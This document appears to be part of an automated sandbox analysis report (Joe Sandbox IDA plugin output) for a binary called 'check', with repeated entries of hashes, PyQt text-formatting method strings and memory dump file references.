                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Cursor$?nextFromLayout@@LongLong_Mode@1@@Position@Text
                                                                                                                                                                                                                • String ID: Bi|E$QTextLayout$nextCursorPosition$nextCursorPosition(self, oldPos: int, mode: QTextLayout.CursorMode = QTextLayout.SkipCharacters) -> int
                                                                                                                                                                                                                • API String ID: 2822426348-83290189
                                                                                                                                                                                                                • Opcode ID: 00fc2f67b0fc38ea88cabdcb9b32ba245c0b5a17e377f5dcc31c7ceb90e21b8e
                                                                                                                                                                                                                • Instruction ID: cd17c016e09220b8e5a0838914d47a1922f102e1a66b48e8443d794dcb1753e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00fc2f67b0fc38ea88cabdcb9b32ba245c0b5a17e377f5dcc31c7ceb90e21b8e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F210BB6B18B56D5EB60CF21E8883AD33A8FB48780F524176DAAC43720DF39D959C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?lastFromIndexLongLong_Of@?$Point@@Point@@@@Vector@
                                                                                                                                                                                                                • String ID: BJ9|i$QPolygon$lastIndexOf$lastIndexOf(self, value: QPoint, from_: int = -1) -> int
                                                                                                                                                                                                                • API String ID: 72233166-1779171152
                                                                                                                                                                                                                • Opcode ID: cf56a6eb6d98bf8586f0c3fbf620f8512ee61f94ca1e7d2b537214403d002d32
                                                                                                                                                                                                                • Instruction ID: d9c96e51792752a087e4af51a0830c2ef9ddede2cfe4eea9f8f91ff3ade13b7b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf56a6eb6d98bf8586f0c3fbf620f8512ee61f94ca1e7d2b537214403d002d32
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5421E8B6B18B56C5EB608F25E8883AD33A8FB49790F914176CAAD43360DF39D959C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                • String ID: QTextListFormat$setIndent$setIndent(self, aindent: int)
                                                                                                                                                                                                                • API String ID: 3865857979-710005523
                                                                                                                                                                                                                • Opcode ID: 6b1b2598b4ac7f4a60d9972e120959c20390d7c61434238d4b8205b06ad799b2
                                                                                                                                                                                                                • Instruction ID: f5d3334e20ffe5466ee54ef37693003daeff94a88c6de69b55933305b3389d47
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b1b2598b4ac7f4a60d9972e120959c20390d7c61434238d4b8205b06ad799b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B421FCB5A08B4BD1EB20CF25E8886A937B8FB85784F914176DA8D43724DF3DD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                • String ID: QTextTableCellFormat$setBottomBorder$setBottomBorder(self, width: float)
                                                                                                                                                                                                                • API String ID: 3865857979-3835632495
                                                                                                                                                                                                                • Opcode ID: 4454c64604d2f7c9eb267be402be5fbc83bcbb9bd0191bfaaf388d7cc4881327
                                                                                                                                                                                                                • Instruction ID: f219e3b9ab75c170ee6d6307776c2ed7bdc80479a501820949107913fc9f3eb8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4454c64604d2f7c9eb267be402be5fbc83bcbb9bd0191bfaaf388d7cc4881327
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9211AB5A08F4AD1EB20DF25E8882A933B8FB49B84FA14076CA4D43724DF3DD55AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                • String ID: QTextFrameFormat$setTopMargin$setTopMargin(self, amargin: float)
                                                                                                                                                                                                                • API String ID: 3865857979-958840985
                                                                                                                                                                                                                • Opcode ID: 304f8a3cb907637c5a33df3487d1b64136dc6e54b89c2963264f1607c25dd06f
                                                                                                                                                                                                                • Instruction ID: 54aa53c5738feb4460843193257fd74378dad4b14bb883412f08dd9470e73d62
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 304f8a3cb907637c5a33df3487d1b64136dc6e54b89c2963264f1607c25dd06f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4211AB5A08F4AD1EB20CF25E8882A933B8FB55784FA14176CA8D43724DF3DD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                • String ID: QTextTableFormat$setBorderCollapse$setBorderCollapse(self, borderCollapse: bool)
                                                                                                                                                                                                                • API String ID: 3865857979-3247476430
                                                                                                                                                                                                                • Opcode ID: 0937f7819fd28e604497c2c8badfe4f3cecfe1ebe1bdb4a9a9e72c617fc1d7d2
                                                                                                                                                                                                                • Instruction ID: 8b0efbb65bff6c34ddae0ca351ed90a006734c2335a4fd1651e241582b8df73f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0937f7819fd28e604497c2c8badfe4f3cecfe1ebe1bdb4a9a9e72c617fc1d7d2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2212CB5A08B5BD1EB20CF21E8886A937B8FB45744F9540B6CA9D03724DF3DD54AC700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                • String ID: QTextBlockFormat$setHeadingLevel$setHeadingLevel(self, alevel: int)
                                                                                                                                                                                                                • API String ID: 3865857979-2168793412
                                                                                                                                                                                                                • Opcode ID: c42df9bfd1ee7217c6657ea42c8a5d791ec7a0822a601180b03f42e06ece30dd
                                                                                                                                                                                                                • Instruction ID: af89eb34b930f351a0f9df303e616fbf5a4ddf156d1871c031abf35a0acd96ee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c42df9bfd1ee7217c6657ea42c8a5d791ec7a0822a601180b03f42e06ece30dd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38215CB1A08B4BC1EB20CF21E8886A933B8FB49B84F904176CA8D43764CF3DD54AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                • String ID: QTextCharFormat$setFontFixedPitch$setFontFixedPitch(self, fixedPitch: bool)
                                                                                                                                                                                                                • API String ID: 3865857979-3591156052
                                                                                                                                                                                                                • Opcode ID: 9359b850cd17ad64363c953d345f6c76e420a23e65edae64e8c61a16a3f35ab8
                                                                                                                                                                                                                • Instruction ID: 5024a8e5233ca4a8eb200ce78b8a84944cfd046a094e508928beb4a3b72a4e6e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9359b850cd17ad64363c953d345f6c76e420a23e65edae64e8c61a16a3f35ab8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B212EB5A08B46D1EF20CF21E8896A937B8FB59784F954076DA9D03724DF3DD549C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                • String ID: QTextCharFormat$setFontLetterSpacing$setFontLetterSpacing(self, spacing: float)
                                                                                                                                                                                                                • API String ID: 3865857979-3956914650
